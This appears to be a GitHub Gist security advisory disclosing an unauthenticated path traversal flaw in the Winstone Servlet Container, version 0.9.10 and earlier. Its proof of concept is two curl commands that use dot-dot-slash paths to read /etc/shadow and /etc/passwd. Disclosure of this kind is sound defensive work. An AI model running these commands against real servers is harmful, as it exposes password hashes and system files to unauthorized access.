Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save VAMorales/ce93f10215c43b2a8344426f4dd59cd3 to your computer and use it in GitHub Desktop.

Select an option

Save VAMorales/ce93f10215c43b2a8344426f4dd59cd3 to your computer and use it in GitHub Desktop.
Rick Knowles Winstone Servlet Container - Unauthenticated Arbitrary File Read - (CVE-2026-56122)

1. Exploit Title: Rick Knowles Winstone Servlet Container - Unauthenticated Arbitrary File Read

Disclosure Date: 06/25/2026

Exploit Authors: Victor A. Morales of GM Sectec, Corp.

Known Affected Versions: 0.9.10 and prior

Description

Winstone Servlet Engine through 0.9.10 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by sending HTTP GET requests with dot-dot-slash sequences that are not sanitized when serving static files from the configured webroot. Attackers can traverse outside the webroot directory using traversal-prefixed paths in a single HTTP request to read any file accessible to the servlet engine process, including sensitive system files when the service runs with elevated privileges.

PoC

Example running with elevated privileges:

curl --path-as-is 'http://<host>:<port>/../../../../../../etc/shadow'

Example running with low privileges:

curl --path-as-is 'http://<host>:<port>/../../../../../../etc/passwd'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment